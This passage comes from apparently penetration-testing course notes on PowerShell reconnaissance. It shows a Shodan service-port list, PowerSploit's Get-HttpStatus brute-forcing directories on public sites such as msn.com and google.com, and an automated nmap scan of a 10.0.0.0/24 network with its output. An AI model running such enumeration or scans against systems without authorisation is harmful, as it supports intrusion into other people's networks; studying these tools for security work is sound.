services```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master> Get-ShodanService\n\n623 : IPMI\n626 : serialnumbered\n5985 : WinRM 2.0\n2455 : Codesys\n5560 : Oracle HTTP\n8098 : Riak Web Interface\n9000 : NAS Web Interfaces\n7071 : Zimbra HTTP\n62078 : iPhone\n137 : NetBIOS\n3000 : ntop\n67 : DHCP\n8090 : Insteon Hub\n2087 : WHM + SSL\n9151 : Tor control port\n1900 : UPnP\n9200 : ElasticSearch\n2323 : Telnet (2323)\n25 : SMTP\n3128 : Squid Proxy\n5353 : mDNS\n21 : FTP\n22 : SSH\n23 : Telnet\n44818 : EtherNetIP\n10000 : Webmin\n4949 : Munin\n3790 : Metasploit\n3388 : RDP (3388)\n8139 : Puppet Agent\n2404 : IEC-104\n1723 : PPTP\n2152 : GPRS Tunneling Protocol\n8089 : Splunk\n502 : Modbus\n5986 : WinRM 2.0 + SSL\n500 : IKE\n995 : POP3 + SSL\n631 : CUPS\n5060 : SIP\n993 : IMAP + SSL\n992 : Telnet + SSL\n465 : SMTP + SSL\n8140 : Puppet Master\n2628 : Dictionary\n18245 : General Electric SRTP\n2123 : GPRS Tunneling Protocol\n32764 : Router backdoor\n8333 : Bitcoin\n123 : NTP\n20000 : DNP3\n1911 : Tridium Fox\n129 : Password generator protocol\n161 : SNMP\n9981 : HTS/ tvheadend\n11 : Systat\n9999 : Telnet (Lantronix)\n13 : Daytime\n15 : Netstat\n1023 : Telnet (1023)\n17 : Quote of the day\n20547 : ProConOS\n19 : Character Generator\n5222 : XMPP\n4443 : Symantec Data Center Security\n16010 : Hbase\n8181 : HTTP (8181)\n53 : DNS\n6666 : Voldemort\n5901 : VNC (5901)\n9944 : Pipeline Pilot\n4022 : Udpxy\n28017 : MongoDB Web Interface\n2067 : DLSW\n64738 : Mumble server\n5007 : Mitsubishi MELSEC-Q\n10001 : Automated Tank Gauge\n9600 : OMRON FINS\n2086 : WHM\n7657 : HTTP (7657)\n4369 : Erlang Port Mapper Daemon\n1200 : Codesys\n9100 : Printer Job Language\n1604 : Citrix\n9051 : Tor control port\n3306 : MySQL\n88 : Kerberos\n111 : Portmap\n110 : POP3\n25565 : Minecraft\n8443 : HTTPS (8443)\n82 : HTTP (82)\n83 : HTTP (83)\n80 : HTTP\n81 : HTTP (81)\n119 : NNTP\n84 : HTTP (84)\n5006 : Mitsubishi MELSEC-Q\n3386 : GPRS Tunneling Protocol\n8888 : AndroMouse\n4040 : Chef\n9943 : Pipeline Pilot + SSL\n9160 : Cassandra\n8069 : OpenERP\n5094 : HART-IP\n3479 : 2-Wire RPC\n1962 : PCWorx\n3389 : RDP\n7777 : Oracle\n5432 : PostgreSQL\n18246 : General Electric SRTP\n7 : Echo\n523 : IBM DB2\n50100 : Telnet\n49152 : Supermicro Web Interface\n1234 : Udpxy\n3780 : Nexpose\n5001 : Synology\n5000 : Synology\n771 : RealPort\n143 : IMAP\n443 : HTTPS\n55553 : Metasploit (55553)\n5008 : NetMobility\n5357 : Microsoft-HTTPAPI/2.0\n55554 : Metasploit (55554)\n445 : SMB\n11211 : MemCache\n4500 : IKE-NAT-T\n8129 : Snapstream\n8834 : Nessus\n102 : Siemens S7\n389 : LDAP\n8000 : Qconn\n79 : Finger\n47808 : BACnet\n1434 : MS-SQL Monitor\n8087 : Riak Protobuf\n8080 : HTTP (8080)\n6000 : X Windows\n2082 : cPanel\n2083 : cPanel + SSL\n27017 : MongoDB\n6001 : X Windows (6001)\n37 : rdate\n789 : Red Lion\n5632 : PC Anywhere\n4911 : Tridium Fox + SSL\n6379 : Redis\n1471 : Hak5 Pineapple\n2375 : Docker\n2376 : Docker + SSL\n515 : Line Printer Daemon\n5900 : VNC\n10243 : Microsoft-HTTPAPI/2.0\n7547 : Modem Web Interface\n\nPS C:\\Users\\Administrator\\Desktop\\Posh-Shodan-master>\n```\n\n###### [PowerSploit](https://github.com/PowerShellMafia/PowerSploit)\n\n- Import ```PowerSploit```\n\n```PowerShell\nPS C:\\Users\\Administrator> cd .\\Desktop\\PowerSploit-master\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Import-Module .\\PowerSploit.psd1\n```\n\n- File and Directory enumeration on web servers.\n(```Get-HttpStatus```)\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Get-Help Get-HttpStatus\n\nNAME\n Get-HttpStatus\n\nSYNOPSIS\n Returns the HTTP Status Codes and full URL for specified paths.\n\n PowerSploit Function: Get-HttpStatus\n Author: Chris Campbell (@obscuresec)\n License: BSD 3-Clause\n Required Dependencies: None\n Optional Dependencies: None\n\n\nSYNTAX\n Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL] []\n\n\nDESCRIPTION\n A script to check for the existence of a path or file on a webserver.\n\n\nRELATED LINKS\n http://obscuresecurity.blogspot.com\n http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html\n\nREMARKS\n To see the examples, type: \"get-help Get-HttpStatus -examples\".\n For more information, type: \"get-help Get-HttpStatus -detailed\".\n For technical information, type: \"get-help Get-HttpStatus -full\".\n For online help, type: \"get-help Get-HttpStatus -online\"\n\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Get-Help Get-HttpStatus -Examples\n\nNAME\n Get-HttpStatus\n\nSYNOPSIS\n Returns the HTTP Status Codes and full URL for specified paths.\n\n PowerSploit Function: Get-HttpStatus\n Author: Chris Campbell (@obscuresec)\n License: BSD 3-Clause\n Required Dependencies: None\n Optional Dependencies: None\n\n -------------------------- EXAMPLE 1 --------------------------\n\n C:\\PS>Get-HttpStatus -Target www.example.com -Path c:\\dictionary.txt | Select-Object {where StatusCode -eq 20*}\n\n\n\n -------------------------- EXAMPLE 2 --------------------------\n\n C:\\PS>Get-HttpStatus -Target www.example.com -Path c:\\dictionary.txt -UseSSL\n\n\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Get-HttpStatus -Target www.commercefun.com -Path .\\Recon\\Dictionaries\\generic.txt -Port 80 | Where-Object {$_.Status -match \"ok\"}\n\n Status URL\n ------ ---\n OK http://www.commercefun.com/../\n OK http://www.commercefun.com/0/\n```\n\n###### Exercise\n\n- Write a script which could save ```home/default``` page for a list of web servers.\n\n```Get-DefaultPage.ps1```\n\n```PowerShell\n$reader = [System.IO.File]::OpenText(\"C:\\Users\\Administrator\\Desktop\\Code\\41\\ip.txt\")\n\nwhile($null -ne ($line = $reader.ReadLine())) {\n $filename = [System.IO.Path]::GetFileName($line)\n Invoke-WebRequest $line -OutFile $filename\n}\n```\n\n- Try ```Get-HttpStatus``` on multiple machines.\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Get-HttpStatus -Target www.msn.com -Path .\\Recon\\Dictionaries\\generic.txt -Port 80 | Where-Object {$_.Status -match \"ok\"}\n\n Status URL\n ------ ---\n OK http://www.msn.com/../\n OK http://www.msn.com/crossdomain.xml\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Get-HttpStatus -Target www.commercefun.com -Path .\\Recon\\Dictionaries\\generic.txt -Port 80 | Where-Object {$_.Status -match \"ok\"}\n\n Status URL\n ------ ---\n OK http://www.commercefun.com/../\n OK http://www.commercefun.com/0/\n```\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master> Get-HttpStatus -Target www.google.com -Path .\\Recon\\Dictionaries\\generic.txt -UseSSL | Where-Object {$_.Status -match \"ok\"}\n\n Status URL\n ------ ---\n OK https://www.google.com/../\n OK https://www.google.com/a/\nPS C:\\Users\\Administrator\\Desktop\\PowerSploit-master>\n```\n" }, { "path": "42-Vulnerability-Scanning-and-Analysis.md", "content": "#### 42. Vulnerability Scanning and Analysis\n\n###### Vulnerability Scanning and Analysis\n\r- Automating ```nmap``` and ```parsing xml``` results\n\n - Automating ```nmap```\n\n\t```Start-AutoNmap.ps1```\n\t\n\t```PowerShell\n\t$outputpath = \"C:\\Users\\Administrator\\Desktop\"\r\n\t$IPRanges = \"10.0.0.1/24\"\r\n\tforeach ($range in $IPRanges)\r\n\t{\r\n\t $temp = $range -split \"/\"\r\n\t $file = $temp[0]\r\n\t & \"nmap.exe\" \"-nvv\" \"-Pn\" \"--top-ports\" \"20\" \"$range\" \"-oX\" \"$Outputpath\\$file.xml\"\r\n\t}\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop> C:\\Users\\Administrator\\Desktop\\Start-AutoNmap.ps1\n\t\n\tStarting Nmap 7.50 ( https://nmap.org ) at 2017-07-10 09:13 Pacific Daylight Time\n\tInitiating ARP Ping Scan at 09:13\n\tScanning 255 hosts [1 port/host]\n\tCompleted ARP Ping Scan at 09:13, 3.96s elapsed (255 total hosts)\n\tNmap scan report for 10.0.0.0 [host down, received no-response]\n\tNmap scan report for 10.0.0.2 [host down, received no-response]\n\tNmap scan report for 10.0.0.3 [host down, received no-response]\n\tNmap scan report for 10.0.0.4 [host down, received no-response]\n\tNmap scan report for 10.0.0.5 [host down, received no-response]\n\tNmap scan report for 10.0.0.6 [host down, received no-response]\n\tNmap scan report for 10.0.0.7 [host down, received no-response]\n\tNmap scan report for 10.0.0.8 [host down, received no-response]\n\tNmap scan report for 10.0.0.9 [host down, received no-response]\n\tNmap scan report for 10.0.0.10 [host down, received no-response]\n\tNmap scan report for 10.0.0.11 [host down, received no-response]\n\tNmap scan report for 10.0.0.12 [host down, received no-response]\n\tNmap scan report for 10.0.0.13 [host down, received no-response]\n\tNmap scan report for 10.0.0.14 [host down, received no-response]\n\tNmap scan report for 10.0.0.15 [host down, received no-response]\n\tNmap scan report for 10.0.0.16 [host down, received no-response]\n\tNmap scan report for 10.0.0.17 [host down, received no-response]\n\tNmap scan report for 10.0.0.18 [host down, received no-response]\n\tNmap scan report for 10.0.0.19 [host down, received no-response]\n\tNmap scan report for 10.0.0.20 [host down, received no-response]\n\tNmap scan report for 10.0.0.21 [host down, received no-response]\n\tNmap scan report for 10.0.0.22 [host down, received no-response]\n\tNmap scan report for 10.0.0.23 [host down, received no-response]\n\tNmap scan report for 10.0.0.24 [host down, received no-response]\n\tNmap scan report for 10.0.0.25 [host down, received no-response]\n\tNmap scan report for 10.0.0.26 [host down, received no-response]\n\tNmap scan report for 10.0.0.27 [host down, received no-response]\n\tNmap scan report for 10.0.0.28 [host down, received no-response]\n\tNmap scan report for 10.0.0.29 [host down, received no-response]\n\tNmap scan report for 10.0.0.30 [host down, received no-response]\n\tNmap scan report for 10.0.0.31 [host down, received no-response]\n\tNmap scan report for 10.0.0.33 [host down, received no-response]\n\tNmap scan report for 10.0.0.34 [host down, received no-response]\n\tNmap scan report for 10.0.0.35 [host down, received no-response]\n\tNmap scan report for 10.0.0.36 [host down, received no-response]\n\tNmap scan report for 10.0.0.37 [host down, received no-response]\n\tNmap scan report for 10.0.0.38 [host down, received no-response]\n\tNmap scan report for 10.0.0.39 [host down, received no-response]\n\tNmap scan report for 10.0.0.40 [host down, received no-response]\n\tNmap scan report for 10.0.0.41 [host down, received no-response]\n\tNmap scan report for 10.0.0.42 [host down, received no-response]\n\tNmap scan report for 10.0.0.43 [host down, received no-response]\n\tNmap scan report for 10.0.0.44 [host down, received no-response]\n\tNmap scan report for 10.0.0.45 [host down, received no-response]\n\tNmap scan report for 10.0.0.46 [host down, received no-response]\n\tNmap scan report for 10.0.0.47 [host down, received no-response]\n\tNmap scan report for 10.0.0.48 [host down, received no-response]\n\tNmap scan report for 10.0.0.49 [host down, received no-response]\n\tNmap scan report for 10.0.0.50 [host down, received no-response]\n\tNmap scan report for 10.0.0.51 [host down, received no-response]\n\tNmap scan report for 10.0.0.52 [host down, received no-response]\n\tNmap scan report for 10.0.0.54 [host down, received no-response]\n\tNmap scan report for 10.0.0.55 [host down, received no-response]\n\tNmap scan report for 10.0.0.56 [host down, received no-response]\n\tNmap scan report for 10.0.0.57 [host down, received no-response]\n\tNmap scan report for 10.0.0.58 [host down, received no-response]\n\tNmap scan report for 10.0.0.59 [host down, received no-response]\n\tNmap scan report for 10.0.0.60 [host down, received no-response]\n\tNmap scan report for 10.0.0.62 [host down, received no-response]\n\tNmap scan report for 10.0.0.63 [host down, received no-response]\n\tNmap scan report for 10.0.0.64 [host down, received no-response]\n\tNmap scan report for 10.0.0.65 [host down, received no-response]\n\tNmap scan report for 10.0.0.66 [host down, received no-response]\n\tNmap scan report for 10.0.0.67 [host down, received no-response]\n\tNmap scan report for 10.0.0.68 [host down, received no-response]\n\tNmap scan report for 10.0.0.69 [host down, received no-response]\n\tNmap scan report for 10.0.0.70 [host down, received no-response]\n\tNmap scan report for 10.0.0.71 [host down, received no-response]\n\tNmap scan report for 10.0.0.72 [host down, received no-response]\n\tNmap scan report for 10.0.0.73 [host down, received no-response]\n\tNmap scan report for 10.0.0.74 [host down, received no-response]\n\tNmap scan report for 10.0.0.75 [host down, received no-response]\n\tNmap scan report for 10.0.0.76 [host down, received no-response]\n\tNmap scan report for 10.0.0.77 [host down, received no-response]\n\tNmap scan report for 10.0.0.78 [host down, received no-response]\n\tNmap scan report for 10.0.0.79 [host down, received no-response]\n\tNmap scan report for 10.0.0.80 [host down, received no-response]\n\tNmap scan report for 10.0.0.81 [host down, received no-response]\n\tNmap scan report for 10.0.0.82 [host down, received no-response]\n\tNmap scan report for 10.0.0.83 [host down, received no-response]\n\tNmap scan report for 10.0.0.84 [host down, received no-response]\n\tNmap scan report for 10.0.0.85 [host down, received no-response]\n\tNmap scan report for 10.0.0.86 [host down, received no-response]\n\tNmap scan report for 10.0.0.87 [host down, received no-response]\n\tNmap scan report for 10.0.0.88 [host down, received no-response]\n\tNmap scan report for 10.0.0.89 [host down, received no-response]\n\tNmap scan report for 10.0.0.90 [host down, received no-response]\n\tNmap scan report for 10.0.0.91 [host down, received no-response]\n\tNmap scan report for 10.0.0.92 [host down, received no-response]\n\tNmap scan report for 10.0.0.93 [host down, received no-response]\n\tNmap scan report for 10.0.0.94 [host down, received no-response]\n\tNmap scan report for 10.0.0.96 [host down, received no-response]\n\tNmap scan report for 10.0.0.97 [host down, received no-response]\n\tNmap scan report for 10.0.0.98 [host down, received no-response]\n\tNmap scan report for 10.0.0.99 [host down, received no-response]\n\tNmap scan report for 10.0.0.100 [host down, received no-response]\n\tNmap scan report for 10.0.0.101 [host down, received no-response]\n\tNmap scan report for 10.0.0.102 [host down, received no-response]\n\tNmap scan report for 10.0.0.103 [host down, received no-response]\n\tNmap scan report for 10.0.0.104 [host down, received no-response]\n\tNmap scan report for 10.0.0.105 [host down, received no-response]\n\tNmap scan report for 10.0.0.106 [host down, received no-response]\n\tNmap scan report for 10.0.0.107 [host down, received no-response]\n\tNmap scan report for 10.0.0.108 [host down, received no-response]\n\tNmap scan report for 10.0.0.109 [host down, received no-response]\n\tNmap scan report for 10.0.0.110 [host down, received no-response]\n\tNmap scan report for 10.0.0.111 [host down, received no-response]\n\tNmap scan report for 10.0.0.112 [host down, received no-response]\n\tNmap scan report for 10.0.0.113 [host down, received no-response]\n\tNmap scan report for 10.0.0.114 [host down, received no-response]\n\tNmap scan report for 10.0.0.115 [host down, received no-response]\n\tNmap scan report for 10.0.0.116 [host down, received no-response]\n\tNmap scan report for 10.0.0.117 [host down, received no-response]\n\tNmap scan report for 10.0.0.118 [host down, received no-response]\n\tNmap scan report for 10.0.0.119 [host down, received no-response]\n\tNmap scan report for 10.0.0.120 [host down, received no-response]\n\tNmap scan report for 10.0.0.121 [host down, received no-response]\n\tNmap scan report for 10.0.0.122 [host down, received no-response]\n\tNmap scan report for 10.0.0.123 [host down, received no-response]\n\tNmap scan report for 10.0.0.124 [host down, received no-response]\n\tNmap scan report for 10.0.0.125 [host down, received no-response]\n\tNmap scan report for 10.0.0.126 [host down, received no-response]\n\tNmap scan report for 10.0.0.127 [host down, received no-response]\n\tNmap scan report for 10.0.0.128 [host down, received no-response]\n\tNmap scan report for 10.0.0.129 [host down, received no-response]\n\tNmap scan report for 10.0.0.130 [host down, received no-response]\n\tNmap scan report for 10.0.0.131 [host down, received no-response]\n\tNmap scan report for 10.0.0.132 [host down, received no-response]\n\tNmap scan report for 10.0.0.133 [host down, received no-response]\n\tNmap scan report for 10.0.0.134 [host down, received no-response]\n\tNmap scan report for 10.0.0.135 [host down, received no-response]\n\tNmap scan report for 10.0.0.136 [host down, received no-response]\n\tNmap scan report for 10.0.0.137 [host down, received no-response]\n\tNmap scan report for 10.0.0.138 [host down, received no-response]\n\tNmap scan report for 10.0.0.139 [host down, received no-response]\n\tNmap scan report for 10.0.0.140 [host down, received no-response]\n\tNmap scan report for 10.0.0.141 [host down, received no-response]\n\tNmap scan report for 10.0.0.142 [host down, received no-response]\n\tNmap scan report for 10.0.0.143 [host down, received no-response]\n\tNmap scan report for 10.0.0.144 [host down, received no-response]\n\tNmap scan report for 10.0.0.145 [host down, received no-response]\n\tNmap scan report for 10.0.0.146 [host down, received no-response]\n\tNmap scan report for 10.0.0.147 [host down, received no-response]\n\tNmap scan report for 10.0.0.148 [host down, received no-response]\n\tNmap scan report for 10.0.0.149 [host down, received no-response]\n\tNmap scan report for 10.0.0.150 [host down, received no-response]\n\tNmap scan report for 10.0.0.151 [host down, received no-response]\n\tNmap scan report for 10.0.0.152 [host down, received no-response]\n\tNmap scan report for 10.0.0.153 [host down, received no-response]\n\tNmap scan report for 10.0.0.154 [host down, received no-response]\n\tNmap scan report for 10.0.0.155 [host down, received no-response]\n\tNmap scan report for 10.0.0.156 [host down, received no-response]\n\tNmap scan report for 10.0.0.157 [host down, received no-response]\n\tNmap scan report for 10.0.0.158 [host down, received no-response]\n\tNmap scan report for 10.0.0.159 [host down, received no-response]\n\tNmap scan report for 10.0.0.160 [host down, received no-response]\n\tNmap scan report for 10.0.0.161 [host down, received no-response]\n\tNmap scan report for 10.0.0.162 [host down, received no-response]\n\tNmap scan report for 10.0.0.163 [host down, received no-response]\n\tNmap scan report for 10.0.0.164 [host down, received no-response]\n\tNmap scan report for 10.0.0.165 [host down, received no-response]\n\tNmap scan report for 10.0.0.166 [host down, received no-response]\n\tNmap scan report for 10.0.0.167 [host down, received no-response]\n\tNmap scan report for 10.0.0.168 [host down, received no-response]\n\tNmap scan report for 10.0.0.169 [host down, received no-response]\n\tNmap scan report for 10.0.0.170 [host down, received no-response]\n\tNmap scan report for 10.0.0.171 [host down, received no-response]\n\tNmap scan report for 10.0.0.172 [host down, received no-response]\n\tNmap scan report for 10.0.0.173 [host down, received no-response]\n\tNmap scan report for 10.0.0.174 [host down, received no-response]\n\tNmap scan report for 10.0.0.175 [host down, received no-response]\n\tNmap scan report for 10.0.0.176 [host down, received no-response]\n\tNmap scan report for 10.0.0.177 [host down, received no-response]\n\tNmap scan report for 10.0.0.178 [host down, received no-response]\n\tNmap scan report for 10.0.0.179 [host down, received no-response]\n\tNmap scan report for 10.0.0.180 [host down, received no-response]\n\tNmap scan report for 10.0.0.181 [host down, received no-response]\n\tNmap scan report for 10.0.0.182 [host down, received no-response]\n\tNmap scan report for 10.0.0.183 [host down, received no-response]\n\tNmap scan report for 10.0.0.184 [host down, received no-response]\n\tNmap scan report for 10.0.0.185 [host down, received no-response]\n\tNmap scan report for 10.0.0.186 [host down, received no-response]\n\tNmap scan report for 10.0.0.187 [host down, received no-response]\n\tNmap scan report for 10.0.0.188 [host down, received no-response]\n\tNmap scan report for 10.0.0.189 [host down, received no-response]\n\tNmap scan report for 10.0.0.190 [host down, received no-response]\n\tNmap scan report for 10.0.0.191 [host down, received no-response]\n\tNmap scan report for 10.0.0.192 [host down, received no-response]\n\tNmap scan report for 10.0.0.193 [host down, received no-response]\n\tNmap scan report for 10.0.0.194 [host down, received no-response]\n\tNmap scan report for 10.0.0.195 [host down, received no-response]\n\tNmap scan report for 10.0.0.196 [host down, received no-response]\n\tNmap scan report for 10.0.0.197 [host down, received no-response]\n\tNmap scan report for 10.0.0.198 [host down, received no-response]\n\tNmap scan report for 10.0.0.199 [host down, received no-response]\n\tNmap scan report for 10.0.0.200 [host down, received no-response]\n\tNmap scan report for 10.0.0.201 [host down, received no-response]\n\tNmap scan report for 10.0.0.202 [host down, received no-response]\n\tNmap scan report for 10.0.0.203 [host down, received no-response]\n\tNmap scan report for 10.0.0.204 [host down, received no-response]\n\tNmap scan report for 10.0.0.205 [host down, received no-response]\n\tNmap scan report for 10.0.0.206 [host down, received no-response]\n\tNmap scan report for 10.0.0.207 [host down, received no-response]\n\tNmap scan report for 10.0.0.208 [host down, received no-response]\n\tNmap scan report for 10.0.0.209 [host down, received no-response]\n\tNmap scan report for 10.0.0.210 [host down, received no-response]\n\tNmap scan report for 10.0.0.211 [host down, received no-response]\n\tNmap scan report for 10.0.0.212 [host down, received no-response]\n\tNmap scan report for 10.0.0.213 [host down, received no-response]\n\tNmap scan report for 10.0.0.214 [host down, received no-response]\n\tNmap scan report for 10.0.0.215 [host down, received no-response]\n\tNmap scan report for 10.0.0.216 [host down, received no-response]\n\tNmap scan report for 10.0.0.217 [host down, received no-response]\n\tNmap scan report for 10.0.0.218 [host down, received no-response]\n\tNmap scan report for 10.0.0.219 [host down, received no-response]\n\tNmap scan report for 10.0.0.220 [host down, received no-response]\n\tNmap scan report for 10.0.0.221 [host down, received no-response]\n\tNmap scan report for 10.0.0.222 [host down, received no-response]\n\tNmap scan report for 10.0.0.223 [host down, received no-response]\n\tNmap scan report for 10.0.0.224 [host down, received no-response]\n\tNmap scan report for 10.0.0.225 [host down, received no-response]\n\tNmap scan report for 10.0.0.226 [host down, received no-response]\n\tNmap scan report for 10.0.0.227 [host down, received no-response]\n\tNmap scan report for 10.0.0.228 [host down, received no-response]\n\tNmap scan report for 10.0.0.229 [host down, received no-response]\n\tNmap scan report for 10.0.0.230 [host down, received no-response]\n\tNmap scan report for 10.0.0.231 [host down, received no-response]\n\tNmap scan report for 10.0.0.232 [host down, received no-response]\n\tNmap scan report for 10.0.0.234 [host down, received no-response]\n\tNmap scan report for 10.0.0.235 [host down, received no-response]\n\tNmap scan report for 10.0.0.236 [host down, received no-response]\n\tNmap scan report for 10.0.0.237 [host down, received no-response]\n\tNmap scan report for 10.0.0.238 [host down, received no-response]\n\tNmap scan report for 10.0.0.239 [host down, received no-response]\n\tNmap scan report for 10.0.0.240 [host down, received no-response]\n\tNmap scan report for 10.0.0.241 [host down, received no-response]\n\tNmap scan report for 10.0.0.242 [host down, received no-response]\n\tNmap scan report for 10.0.0.243 [host down, received no-response]\n\tNmap scan report for 10.0.0.244 [host down, received no-response]\n\tNmap scan report for 10.0.0.245 [host down, received no-response]\n\tNmap scan report for 10.0.0.246 [host down, received no-response]\n\tNmap scan report for 10.0.0.247 [host down, received no-response]\n\tNmap scan report for 10.0.0.248 [host down, received no-response]\n\tNmap scan report for 10.0.0.249 [host down, received no-response]\n\tNmap scan report for 10.0.0.250 [host down, received no-response]\n\tNmap scan report for 10.0.0.251 [host down, received no-response]\n\tNmap scan report for 10.0.0.252 [host down, received no-response]\n\tNmap scan report for 10.0.0.253 [host down, received no-response]\n\tNmap scan report for 10.0.0.255 [host down, received no-response]\n\tInitiating SYN Stealth Scan at 09:13\n\tScanning 6 hosts [20 ports/host]\n\tDiscovered open port 80/tcp on 10.0.0.1\n\tDiscovered open port 111/tcp on 10.0.0.254\n\tDiscovered open port 53/tcp on 10.0.0.1\n\tDiscovered open port 443/tcp on 10.0.0.1\n\tCompleted SYN Stealth Scan at 09:13, 2.16s elapsed (120 total ports)\n\tNmap scan report for 10.0.0.1\n\tHost is up, received arp-response (0.022s latency).\n\tScanned at 2017-07-10 09:13:17 Pacific Daylight Time for 6s\n\t\n\tPORT STATE SERVICE REASON\n\t21/tcp closed ftp reset ttl 64\n\t22/tcp filtered ssh no-response\n\t23/tcp filtered telnet no-response\n\t25/tcp closed smtp reset ttl 64\n\t53/tcp open domain syn-ack ttl 64\n\t80/tcp open http syn-ack ttl 64\n\t110/tcp closed pop3 reset ttl 64\n\t111/tcp closed rpcbind reset ttl 64\n\t135/tcp closed msrpc reset ttl 64\n\t139/tcp closed netbios-ssn reset ttl 64\n\t143/tcp closed imap reset ttl 64\n\t443/tcp open https syn-ack ttl 64\n\t445/tcp closed microsoft-ds reset ttl 64\n\t993/tcp closed imaps reset ttl 64\n\t995/tcp closed pop3s reset ttl 64\n\t1723/tcp closed pptp reset ttl 64\n\t3306/tcp closed mysql reset ttl 64\n\t3389/tcp closed ms-wbt-server reset ttl 64\n\t5900/tcp closed vnc reset ttl 64\n\t8080/tcp closed http-proxy reset ttl 64\n\tMAC Address: 00:50:F1:80:00:00 (Intel)\n\t\n\tNmap scan report for 10.0.0.32\n\tHost is up, received arp-response (0.029s latency).\n\tScanned at 2017-07-10 09:13:17 Pacific Daylight Time for 4s\n\t\n\tPORT STATE SERVICE REASON\n\t21/tcp closed ftp reset ttl 64\n\t22/tcp closed ssh reset ttl 64\n\t23/tcp closed telnet reset ttl 64\n\t25/tcp closed smtp reset ttl 64\n\t53/tcp closed domain reset ttl 64\n\t80/tcp closed http reset ttl 64\n\t110/tcp closed pop3 reset ttl 64\n\t111/tcp closed rpcbind reset ttl 64\n\t135/tcp closed msrpc reset ttl 64\n\t139/tcp closed netbios-ssn reset ttl 64\n\t143/tcp closed imap reset ttl 64\n\t443/tcp closed https reset ttl 64\n\t445/tcp closed microsoft-ds reset ttl 64\n\t993/tcp closed imaps reset ttl 64\n\t995/tcp closed pop3s reset ttl 64\n\t1723/tcp closed pptp reset ttl 64\n\t3306/tcp closed mysql reset ttl 64\n\t3389/tcp closed ms-wbt-server reset ttl 64\n\t5900/tcp closed vnc reset ttl 64\n\t8080/tcp closed http-proxy reset ttl 64\n\tMAC Address: 90:FD:61:C0:9B:B2 (Apple)\n\t\n\tNmap scan report for 10.0.0.53\n\tHost is up, received arp-response (0.00s latency).\n\tScanned at 2017-07-10 09:13:17 Pacific Daylight Time for 6s\n\t\n\tPORT STATE SERVICE REASON\n\t21/tcp filtered ftp no-response\n\t22/tcp filtered ssh no-response\n\t23/tcp filtered telnet no-response\n\t25/tcp filtered smtp no-response\n\t53/tcp filtered domain no-response\n\t80/tcp filtered http no-response\n\t110/tcp filtered pop3 no-response\n\t111/tcp filtered rpcbind no-response\n\t135/tcp filtered msrpc no-response\n\t139/tcp filtered netbios-ssn no-response\n\t143/tcp filtered imap no-response\n\t443/tcp filtered https no-response\n\t445/tcp filtered microsoft-ds no-response\n\t993/tcp filtered imaps no-response\n\t995/tcp filtered pop3s no-response\n\t1723/tcp filtered pptp no-response\n\t3306/tcp filtered mysql no-response\n\t3389/tcp filtered ms-wbt-server no-response\n\t5900/tcp filtered vnc no-response\n\t8080/tcp filtered http-proxy no-response\n\tMAC Address: 40:F0:2F:57:6C:13 (Liteon Technology)\n\t\n\tNmap scan report for 10.0.0.61\n\tHost is up, received arp-response (0.026s latency).\n\tScanned at 2017-07-10 09:13:17 Pacific Daylight Time for 4s\n\t\n\tPORT STATE SERVICE REASON\n\t21/tcp closed ftp reset ttl 64\n\t22/tcp closed ssh reset ttl 64\n\t23/tcp closed telnet reset ttl 64\n\t25/tcp closed smtp reset ttl 64\n\t53/tcp closed domain reset ttl 64\n\t80/tcp closed http reset ttl 64\n\t110/tcp closed pop3 reset ttl 64\n\t111/tcp closed rpcbind reset ttl 64\n\t135/tcp closed msrpc reset ttl 64\n\t139/tcp closed netbios-ssn reset ttl 64\n\t143/tcp closed imap reset ttl 64\n\t443/tcp closed https reset ttl 64\n\t445/tcp closed microsoft-ds reset ttl 64\n\t993/tcp closed imaps reset ttl 64\n\t995/tcp closed pop3s reset ttl 64\n\t1723/tcp closed pptp reset ttl 64\n\t3306/tcp closed mysql reset ttl 64\n\t3389/tcp closed ms-wbt-server reset ttl 64\n\t5900/tcp closed vnc reset ttl 64\n\t8080/tcp closed http-proxy reset ttl 64\n\tMAC Address: 00:9A:CD:C9:77:54 (Huawei Technologies)\n\t\n\tNmap scan report for 10.0.0.95\n\tHost is up, received arp-response (0.0022s latency).\n\tScanned at 2017-07-10 09:13:17 Pacific Daylight Time for 4s\n\t\n\tPORT STATE SERVICE REASON\n\t21/tcp closed ftp reset ttl 64\n\t22/tcp closed ssh reset ttl 64\n\t23/tcp closed telnet reset ttl 64\n\t25/tcp closed smtp reset ttl 64\n\t53/tcp closed domain reset ttl 64\n\t80/tcp closed http reset ttl 64\n\t110/tcp closed pop3 reset ttl 64\n\t111/tcp closed rpcbind reset ttl 64\n\t135/tcp closed msrpc reset ttl 64\n\t139/tcp closed netbios-ssn reset ttl 64\n\t143/tcp closed imap reset ttl 64\n\t443/tcp closed https reset ttl 64\n\t445/tcp closed microsoft-ds reset ttl 64\n\t993/tcp closed imaps reset ttl 64\n\t995/tcp closed pop3s reset ttl 64\n\t1723/tcp closed pptp reset ttl 64\n\t3306/tcp closed mysql reset ttl 64\n\t3389/tcp closed ms-wbt-server reset ttl 64\n\t5900/tcp closed vnc reset ttl 64\n\t8080/tcp closed http-proxy reset ttl 64\n\tMAC Address: F4:0F:24:33:5E:D1 (Apple)\n\t\n\tNmap scan report for 10.0.0.254\n\tHost is up, received arp-response (0.013s latency).\n\tScanned at 2017-07-10 09:13:17 Pacific Daylight Time for 4s\n\t\n\tPORT STATE SERVICE REASON\n\t21/tcp closed ftp reset ttl 64\n\t22/tcp closed ssh reset ttl 64\n\t23/tcp closed telnet reset ttl 64\n\t25/tcp closed smtp reset ttl 64\n\t53/tcp closed domain reset 